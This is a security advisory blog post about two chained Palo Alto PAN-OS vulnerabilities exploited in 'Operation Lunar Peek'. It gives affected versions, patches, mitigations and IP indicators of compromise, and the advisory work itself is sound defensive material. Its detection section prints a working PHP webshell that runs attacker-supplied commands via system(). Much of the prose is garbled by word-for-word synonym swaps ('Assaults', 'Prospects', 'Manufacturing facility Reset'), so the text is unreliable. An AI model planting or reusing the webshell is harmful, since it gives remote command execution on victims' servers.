Overview
The German CERT has raised the alarm bells for the exploitation of chained vulnerabilities, urging customers to patch them urgently as a whole bunch of weak cases stay uncovered across the nation and the globe.
CERT-Bund warned in a notification on X earlier this week: “Assaults are already going down. Prospects ought to instantly safe their firewalls.” This warning was for 2 important vulnerabilities, CVE-2024-0012 and CVE-2024-9474, in Palo Alto Networks’ PAN-OS.
Palo Alto confirmed that these bugs have been actively exploited in a restricted set of assaults, monitoring beneath the banner “Operation Lunar Peek.” These vulnerabilities enable attackers to realize unauthorized administrative privileges and execute arbitrary instructions, posing a big threat to organizations utilizing affected units.
Whereas fixes have been launched, the urgency of patching, monitoring, and securing firewall administration interfaces has by no means been greater. This weblog offers an in depth breakdown of the vulnerabilities, exploitation patterns, and actionable remediation methods to safeguard towards this ongoing menace.
Understanding the Vulnerabilities
CVE-2024-0012: Authentication Bypass Vulnerability
- Severity: Crucial
- Influence: Permits unauthenticated attackers with community entry to the administration internet interface to:
- Achieve PAN-OS administrator privileges.
- Tamper with configurations.
- Exploit different privilege escalation vulnerabilities, corresponding to CVE-2024-9474.
- Affected Merchandise:
PAN-OS 10.2, 11.0, 11.1, and 11.2 software program on PA-Collection, VM-Collection, CN-Collection firewalls, Panorama home equipment, and WildFire.
Word: Cloud NGFW and Prisma Entry aren’t affected. - Root Trigger: Lacking authentication checks for important capabilities inside the PAN-OS administration internet interface.
CVE-2024-9474: Privilege Escalation Vulnerability
- Severity: Crucial
- Influence: Permits authenticated PAN-OS directors to escalate privileges and execute arbitrary instructions with root entry.
- Affected Merchandise: Identical as CVE-2024-0012, with extra fixes obtainable for PAN-OS 10.1.
These vulnerabilities are notably harmful when chained collectively, enabling unauthenticated distant command execution on weak units. Palo Alto stated that it assesses with reasonable to excessive confidence {that a} useful exploit chaining CVE-2024-0012 and CVE-2024-9474 is publicly obtainable.
Noticed Exploitation in Operation Lunar Peek
Palo Alto Networks’ Unit 42 crew is actively monitoring exploitation actions tied to those vulnerabilities. Key observations embrace:
- Preliminary Entry: Exploitation has primarily focused PAN-OS administration internet interfaces uncovered to the web. Many assaults originated from IP addresses related to nameless VPN providers or proxies.
- Submit-Exploitation Exercise:
- Interactive command execution.
- Deployment of webshells, corresponding to a payload recovered with SHA256: 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668.
- Potential lateral motion and additional compromise of community property.
- Scanning Exercise: Elevated guide and automatic scans, probably probing for weak interfaces. A report by Censys discovered 13,324 publicly uncovered administration interfaces globally, with 34% positioned in the USA. Greater than 200 had been positioned in Germany. German CERT has additionally confirmed energetic exploitation, urging organizations to “instantly safe their firewalls.”
Remediation and Mitigation
Patching
Palo Alto Networks has launched patches addressing each vulnerabilities. Organizations should improve to the next variations instantly:
- PAN-OS 10.2: 10.2.12-h2 or later.
- PAN-OS 11.0: 11.0.6-h1 or later.
- PAN-OS 11.1: 11.1.5-h1 or later.
- PAN-OS 11.2: 11.2.4-h1 or later.
- PAN-OS 10.1: 10.1.14-h6 (for CVE-2024-9474).
Securing Administration Interfaces
Palo Alto Networks strongly recommends the next:
- Prohibit Interface Entry: Enable solely trusted inside IP addresses or designated leap packing containers to entry the administration interface.
- Disable Public Entry: Block internet-facing entry to the administration interface through network-level controls.
- Allow Two-Issue Authentication (2FA): Add an additional layer of safety for administrator entry.
Monitoring and Detection
- Deploy detection guidelines for webshells and different malicious artifacts. The next decoded PHP webshell pattern was noticed throughout Operation Lunar Peek:
<?php $z=”system”;
if(${“_POST”}[“b”]==”iUqPd”)
{
$z(${“_POST”}[“x”]);
};
- Look ahead to irregular actions corresponding to:
- Unrecognized configuration adjustments.
- New or suspicious administrator accounts.
- Command execution logs indicating unauthorized entry.
Enhanced Manufacturing facility Reset (EFR)
Organizations detecting proof of compromise ought to:
- Take affected units offline instantly.
- Carry out an Enhanced Manufacturing facility Reset (EFR) in collaboration with Palo Alto Networks help.
- Reconfigure the machine with up to date firmware and safe administration insurance policies.
Indicators of Compromise (IOCs)
IP Addresses Noticed in Scans and Exploits
- Scanning Sources:
- 41.215.28[.]241
- 45.32.110[.]123
- 103.112.106[.]17
- 104.28.240[.]123
- 182.78.17[.]137
- 216.73.160[.]186
- Risk Actor Proxies:
- 91.208.197[.]167
- 104.28.208[.]123
- 136.144.17[.]146
- 136.144.17[.]149
- 136.144.17[.]154
- 136.144.17[.]158
- 136.144.17[.]161
- 136.144.17[.]164
- 136.144.17[.]166
- 136.144.17[.]167
- 136.144.17[.]170
- 136.144.17[.]176
- 136.144.17[.]177
- 136.144.17[.]178
- 136.144.17[.]180
- 173.239.218[.]248
- 173.239.218[.]251
- 209.200.246[.]173
- 209.200.246[.]184
- 216.73.162[.]69
- 216.73.162[.]71
- 216.73.162[.]73
- 216.73.162[.]74
Malicious Artifacts
- Webshell payload hash (PHP webshell payload dropped on a compromised firewall – SHA256): 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668.
References:
https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2024/2024-291133-1032
https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474